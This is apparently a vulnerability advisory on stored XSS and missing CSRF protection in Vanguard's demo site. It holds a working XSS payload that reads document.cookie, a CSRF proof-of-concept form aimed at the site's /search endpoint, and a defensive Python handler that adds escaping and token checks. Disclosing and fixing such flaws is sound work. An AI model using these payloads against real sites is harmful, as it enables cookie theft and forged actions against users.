Vanguard XSS/CSRF
ADLab of Venustech
Well, when I pentested the official demo site of Vanguard, I found some vulnerabilities there.
XSS:
There are several stored XSS vulnerabilities in this system, for example:
http://vanguard-demo.esy.es/search
POST parameter:
phps_query=123'"><svg/onload=alert(document.cookie)><'"&phps_search=
CSRF:
Because there is no CSRF protection here, a CSRF attack can trick a user into triggering the reflected XSS, or change something sensitive in the panel directly. By the way, I just found no protection in the user panel here.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://vanguard-demo.esy.es/search" method="POST">
<!-- double quotes inside the value attribute must be written as &quot;, otherwise the attribute ends early and the form submits a truncated query -->
<input type="hidden" name="phps_query" value="123'&quot;><svg/onload=alert(document.cookie)><'&quot;" />
<input type="hidden" name="phps_search" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
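As an added defensive example (not Vanguard's code), the following hypothetical Python handler for /search shows the two fixes this advisory points at: a per-session CSRF token compared in constant time (with an Origin check as defence in depth) so a cross-site form like the PoC above is rejected, and HTML-escaping of phps_query before it is echoed so the stored payload renders as inert text. The function names, the session dict and the site origin are assumptions.

```python
import hmac
import html
import secrets
from typing import Optional, Tuple

# Constructed stand-in for the application's origin; the form field names
# (phps_query, phps_search) are the ones from the captured request.
SITE_ORIGIN = "http://vanguard-demo.esy.es"


def issue_csrf_token(session: dict) -> str:
    """Mint a per-session CSRF token; embed it as a hidden field in every state-changing form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: dict, submitted: Optional[str]) -> bool:
    """Constant-time check; a missing session token or a missing form field fails closed."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_search(session: dict, form: dict, origin: Optional[str]) -> Tuple[int, str]:
    """Hardened /search: reject cross-site POSTs, then escape the query before echoing it."""
    # Browsers attach an Origin header to cross-site form POSTs; a foreign origin is refused.
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site request rejected"
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    query = form.get("phps_query", "")
    # quote=True also escapes " and ', so the payload cannot break out of an attribute either.
    safe = html.escape(query, quote=True)
    return 200, f"<p>Results for: {safe}</p>"


if __name__ == "__main__":
    sess: dict = {}
    tok = issue_csrf_token(sess)
    payload = "123'\"><svg/onload=alert(document.cookie)><'\""  # the advisory's payload
    print(handle_search(sess, {"phps_query": payload, "csrf_token": tok}, SITE_ORIGIN))
    print(handle_search(sess, {"phps_query": payload}, "http://attacker.example"))
```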
